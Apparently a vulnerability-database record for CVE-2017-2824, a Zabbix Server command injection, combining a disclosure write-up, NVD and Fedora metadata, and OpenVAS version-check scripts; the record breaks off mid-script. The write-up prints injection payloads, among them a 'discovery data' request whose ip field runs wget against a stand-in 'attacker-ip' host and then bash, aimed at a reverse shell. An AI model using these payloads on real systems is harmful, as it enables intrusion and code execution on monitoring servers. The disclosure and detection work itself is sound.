{"type": "seebug", "viewCount": 62, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2017-11-19T11:58:03", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-2824"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106835", "OPENVAS:1361412562310703937", "OPENVAS:1361412562310872804", "OPENVAS:1361412562310872807", "OPENVAS:1361412562310106796"]}, {"type": "talos", "idList": ["TALOS-2017-0325"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_5DF8BD95829011E793AF005056925DB4.NASL", "FEDORA_2017-63ACA509FB.NASL", "ZABBIX_SERVER_CVE-2017-2824.NASL", "FEDORA_2017-5C8A4EBCCD.NASL", "DEBIAN_DSA-3937.NASL", "ZABBIX_FRONTEND_3_2_5.NASL", "FEDORA_2017-D191FB7FCE.NASL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785725", "MYHACK58:62201785663"]}, {"type": "fedora", "idList": ["FEDORA:72A54603EB55", "FEDORA:3641B601C848", "FEDORA:B2CA160C94DD"]}, {"type": "freebsd", "idList": ["5DF8BD95-8290-11E7-93AF-005056925DB4"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3937-1:63B5F"]}], "modified": "2017-11-19T11:58:03", "rev": 2}, "vulnersScore": 6.2}, "reporter": "Root", "title": "Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability\uff08 CVE-2017-2824\uff09", "cvelist": ["CVE-2017-2824"], "bulletinFamily": "exploit", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "references": [], "enchantments_done": [], "modified": "2017-04-28T00:00:00", "description": "**Official patch earlier to fix the vulnerabilities**: the [Zabbix database write vulnerability](<https://www.seebug.org/vuldb/ssvid-93061>)\n\nThe vulnerability lies within the \u00ecTrapper\u00ee section of the Zabbix Code, this is the network service that allows the Proxies and the Server to communicate (TCP Port 10051) There are a set of API calls that the Zabbix Server exposes to the Zabbix proxy, the two that will be discussed are the \u00ecdiscovery data\u00ee and \u00eccommand\u00ee requests. Example data of these requests are shown below:\n\n`` '{\"request\":\"command\",\"scriptid\":1,\"hostid\":10001}'\n\n'{\"request\":\"discovery data\",\"host\":\"zabbix-proxy.com\",\"clock\":10, \"data\":[{\"clock\":10,\"drule\":1,\"dcheck2,\"type\":0,\"ip\u00ee:\u00ee10. 0. 0. 1 \u00ee, \"dns\":\"zabbix-agent.com\", \u00ecport\":10050,\"key\":\"test\",\"status\":0,\"value\":\"test_value\"}]}\n\n``\n\nIt should be noted that the \u00ecrequest\u00ee command invokes a script located in the Zabbix database without any authentication occurring (which might be considered a bug in itself).\n\nAnother pivotal aspect of the vulnerability is that by default, the Zabbix 2.4. X populates the MySQL database with 3 scripts inside of the scripts table:\n\n``\n\n# scriptid == 1 == /bin/ping-c {HOST. CONN} 2&gt;&amp;1\n\n# scriptid == 2 == /usr/bin/traceroute {HOST. CONN} 2&gt;&amp;1\n\n# scriptid == 3 == sudo /usr/bin/nmap-O {HOST. CONN} 2&gt;&amp;1\n\n``\n\nThe problem lies in the fact that the {HOST. CONN} field actually gets replaced by the host\u00eds IP address during the invocation of the script. The value that replaces the {HOST. CONN} is located in the Zabbix \u00ecinterface\u00ee table, and is stored as the \u00ecIP\u00ee field as a VARCHAR(64). Thus, if an attacker can create an interface with a command injection as the IP address, and script with {HOST. CONN} is run via the \u00eccommand\u00ee request, the command injection will occur and a reverse shell can be gained.\n\nThe difficulty lies in actually getting a valid entry into the Zabbix \u00echost\u00ee table. By default, an unauthenticated attacker cannot do this, it requires a minor configuration on the part of the system administrators, specifically in regards to Zabbix\u00eds Auto-discovery feature.\n\nZabbix\u00eds Auto-discovery and Auto-registration features allow for the configuration of the Zabbix Server to occur based on the data presented Zabbix Server the Zabbix Proxy. More specifically, if a hosts presents certain characteristics to the Zabbix Proxy, based on the configuration of the server, certain actions could be potentially taken, one of which causes the newly discovered host to get added to certain Zabbix database tables. When this occurs, a host is inserted into the \u00echosts\u00ee table and also an entry into the Zabbix \u00ecinterface\u00ee table will be created, with the IP address presented by the host being inserted into the IP column, without any validation of that IP address occurring.\n\nThus, by sending a \u00ecdiscovery data\u00ee request to the server with a suitable host, a command injection can be inserted into the database:\n\n`` write_script_cmd = '{ \"request\":\"discovery data\", \"host\":\"zabbix-proxy. domain. fake\", \"clock\":148535399, \"data\":[{ \"clock\":1485353070, \"drule\":88, \"dcheck\":174, \"type\":0, \"ip\":\";wget-O /tmp/s http://attacker-ip/s;#\", \"dns\":\"host28. domain. fake\", \"port\":10050, \"key\":\"sectest\", \"status\":0, \"value\":\"lnx&lt;(^_^)&gt;host\" }]}'\n\n``\n\nDue to the size limitation of the \u00ebip\u00ed field of the Zabbix \u00ecInterface\u00ee table, a second host was inserted into the table with another IP address.\n\n`` // The Host 2 \u00ecip\u00ee:\u00ee;/bin/bash /tmp/s;#\u00ee\n\n``\n\nAfter these two hosts were added, there was still the issue of not knowing the hostid\u00eds for the \u00eccommand\u00ee request, but this was easily solved by brute forcing backwards into the database since the command request would return a different response if the host actually existed or not, and once the hostid\u00eds of the injected hosts were known, they could be invoked directly, and a reverse shell could be gained.\n\n### Mitigation\n\nBy removing the three default script entries inside of the Zabbix Server\u00eds \u00ecZabbix\u00ee database, an attacker would be unable to actually execute code, even if they can insert the hosts with spoofed addresses into the database. This should not affect an organizations current operations, unless teh scripts are actually used. This proposed fix can either be done directly from the database (use zabbix; delete * from scripts;) or from the GUI interface (Administration -&gt; Scripts -&gt; Checkmarks -&gt; \u00ecDelete Selected\u00ee/\u00eeGo\u00ee).\n\n### Credit\n\nDiscovered by Lilith Wyatt of the Cisco ASIG\n\n### TIMELINE\n\n2017-03-22 - Vendor Disclosure \n2017-04-27 - Public Release\n", "href": "https://www.seebug.org/vuldb/ssvid-93060", "id": "SSV:93060", "status": "cve,details", "lastseen": "2017-11-19T11:58:03", "sourceData": "", "published": "2017-04-28T00:00:00"}

{"cve": [{"lastseen": "2020-10-03T13:07:42", "description": "An exploitable code execution vulnerability exists in the trapper command functionality of Zabbix Server 2.4.X. A specially crafted set of packets can cause a command injection resulting in remote code execution. An attacker can make requests from an active Zabbix Proxy to trigger this vulnerability.", "edition": 4, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-24T14:29:00", "title": "CVE-2017-2824", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2824"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:zabbix:zabbix:2.4.9", "cpe:/a:zabbix:zabbix:2.4.0", "cpe:/a:zabbix:zabbix:2.4.4", "cpe:/a:zabbix:zabbix:2.4.7", "cpe:/a:zabbix:zabbix:2.4.3", "cpe:/a:zabbix:zabbix:2.4.6", "cpe:/a:zabbix:zabbix:2.4.2", "cpe:/a:zabbix:zabbix:2.4.5", "cpe:/a:zabbix:zabbix:2.4.8", "cpe:/a:zabbix:zabbix:2.4.1"], "id": "CVE-2017-2824", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2824", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zabbix:zabbix:2.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.9:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.8:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:zabbix:zabbix:2.4.8:*:*:*:*:*:*:*"]}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2824"], "description": "Zabbix is software that monitors numerous parameters of a network and the health and integrity of servers. Zabbix uses a flexible notification mechan ism that allows users to configure e-mail based alerts for virtually any event. This allows a fast reaction to server problems. Zabbix offers excellent reporting and data visualization features based on the stored data. This makes Zabbix ideal for capacity planning. Zabbix supports both polling and trapping. All Zabbix reports and statistic s, as well as configuration parameters are accessed through a web-based front end. A web-based front end ensures that the status of your network and the healt h of your servers can be assessed from any location. Properly configured, Zabbix can play an important role in monitoring IT infrastructure. This is equally true for small organizations with a few servers and for large companies with a multitude of servers. ", "modified": "2017-07-03T02:20:07", "published": "2017-07-03T02:20:07", "id": "FEDORA:72A54603EB55", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: zabbix-3.0.9-1.fc24", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2824"], "description": "Zabbix is software that monitors numerous parameters of a network and the health and integrity of servers. Zabbix uses a flexible notification mechan ism that allows users to configure e-mail based alerts for virtually any event. This allows a fast reaction to server problems. Zabbix offers excellent reporting and data visualization features based on the stored data. This makes Zabbix ideal for capacity planning. Zabbix supports both polling and trapping. All Zabbix reports and statistic s, as well as configuration parameters are accessed through a web-based front end. A web-based front end ensures that the status of your network and the healt h of your servers can be assessed from any location. Properly configured, Zabbix can play an important role in monitoring IT infrastructure. This is equally true for small organizations with a few servers and for large companies with a multitude of servers. ", "modified": "2017-07-03T03:21:10", "published": "2017-07-03T03:21:10", "id": "FEDORA:3641B601C848", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: zabbix-3.0.9-1.fc25", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2824"], "description": "Zabbix is software that monitors numerous parameters of a network and the health and integrity of servers. Zabbix uses a flexible notification mechan ism that allows users to configure e-mail based alerts for virtually any event. This allows a fast reaction to server problems. Zabbix offers excellent reporting and data visualization features based on the stored data. This makes Zabbix ideal for capacity planning. Zabbix supports both polling and trapping. All Zabbix reports and statistic s, as well as configuration parameters are accessed through a web-based front end. A web-based front end ensures that the status of your network and the healt h of your servers can be assessed from any location. Properly configured, Zabbix can play an important role in monitoring IT infrastructure. This is equally true for small organizations with a few servers and for large companies with a multitude of servers. ", "modified": "2017-07-07T23:16:51", "published": "2017-07-07T23:16:51", "id": "FEDORA:B2CA160C94DD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: zabbix-3.0.9-1.fc26", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:34:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2824"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-07-03T00:00:00", "id": "OPENVAS:1361412562310872804", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872804", "type": "openvas", "title": "Fedora Update for zabbix FEDORA-2017-d191fb7fce", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zabbix FEDORA-2017-d191fb7fce\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872804\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-03 14:53:56 +0200 (Mon, 03 Jul 2017)\");\n script_cve_id(\"CVE-2017-2824\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for zabbix FEDORA-2017-d191fb7fce\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'zabbix'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"zabbix on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-d191fb7fce\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WNI44WPWRABZ6AJIPLNKY3WT6U22JAWN\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"zabbix\", rpm:\"zabbix~3.0.9~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2824"], "description": "An exploitable code execution vulnerability exists in the trapper command\nfunctionality of Zabbix Server. A specially crafted set of packets can cause a command injection resulting in\nremote code execution. An attacker can make requests from an active Zabbix Proxy to trigger this vulnerability.", "modified": "2018-10-26T00:00:00", "published": "2017-05-29T00:00:00", "id": "OPENVAS:1361412562310106835", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106835", "type": "openvas", "title": "Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_zabbix_code_rce_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zabbix:zabbix\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106835\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-29 11:13:22 +0700 (Mon, 29 May 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2017-2824\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_name(\"Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"zabbix_web_detect.nasl\");\n script_mandatory_keys(\"Zabbix/installed\");\n\n script_tag(name:\"summary\", value:\"An exploitable code execution vulnerability exists in the trapper command\nfunctionality of Zabbix Server. A specially crafted set of packets can cause a command injection resulting in\nremote code execution. An attacker can make requests from an active Zabbix Proxy to trigger this vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Zabbix version 2.4.x\");\n\n script_tag(name:\"solution\", value:\"By removing the three default script entries inside of the Zabbix Server's\n'Zabbix' database, an attacker would be unable to actually execute code, even if they can insert hosts with\nspoofed addresses into the database. This should not affect an organizations current operations, unless the\nscripts are actually used.\");\n\n script_xref(name:\"URL\", value:\"https://talosintelligence.com/vulnerability_reports/TALOS-2017-0325\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version =~ \"^2\\.4\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"None\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2824"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-07-03T00:00:00", "id": "OPENVAS:1361412562310872807", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872807", "type": "openvas", "title": "Fedora Update for zabbix FEDORA-2017-63aca509fb", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zabbix FEDORA-2017-63aca509fb\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872807\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-03 14:54:06 +0200 (Mon, 03 Jul 2017)\");\n script_cve_id(\"CVE-2017-2824\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for zabbix FEDORA-2017-63aca509fb\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'zabbix'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"zabbix on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-63aca509fb\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QYS4LJ5A6CNBP77QBTSKQH5LHYIYAQ5M\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"zabbix\", rpm:\"zabbix~3.0.9~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2825", "CVE-2017-2824"], "description": "Zabbix is prone to multiple vulnerabilities.", "modified": "2018-10-26T00:00:00", "published": "2017-04-28T00:00:00", "id": "OPENVAS:1361412562310106796", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106796", "type": "openvas", "title": "Zabbix Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_zabbix_mult_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Zabbix Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zabbix:zabbix\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106796\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-28 08:43:22 +0200 (Fri, 28 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2017-2824\", \"CVE-2017-2825\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Zabbix Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"zabbix_web_detect.nasl\");\n script_mandatory_keys(\"Zabbix/installed\");\n\n script_tag(name:\"summary\", value:\"Zabbix is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Zabbix is prone to multiple vulnerabilities:\n\n - Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability (CVE-2017-2824)\n\n - Zabbix Proxy Server SQL Database Write Vulnerability (CVE-2017-2825)\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker may execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Zabbix version prior to 2.0.21, 2.2.x, 3.0.x and 3.2.x.\");\n\n script_tag(name:\"solution\", value:\"Update to 2.0.21, 2.2.18, 3.0.9, 3.2.5 or newer versions.\");\n\n script_xref(name:\"URL\", value:\"http://blog.talosintelligence.com/2017/04/zabbix-multiple-vulns.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"2.0.21\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.0.21\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version =~ \"^2\\.2\") {\n if (version_is_less(version: version, test_version: \"2.2.18\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.2.18\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^3\\.0\") {\n if (version_is_less(version: version, test_version: \"3.0.9\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"3.0.9\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^3\\.2\") {\n if (version_is_less(version: version, test_version: \"3.2.5\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"3.2.5\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2825", "CVE-2017-2824"], "description": "Lilith Wyatt discovered two vulnerabilities in the Zabbix network\nmonitoring system which may result in execution of arbitrary code or\ndatabase writes by malicious proxies.", "modified": "2019-03-18T00:00:00", "published": "2017-08-12T00:00:00", "id": "OPENVAS:1361412562310703937", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703937", "type": "openvas", "title": "Debian Security Advisory DSA 3937-1 (zabbix - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3937.nasl 14280 2019-03-18 14:50:45Z cfischer $\n#\n# Auto-generated from advisory DSA 3937-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703937\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-2824\", \"CVE-2017-2825\");\n script_name(\"Debian Security Advisory DSA 3937-1 (zabbix - security update)\");\n 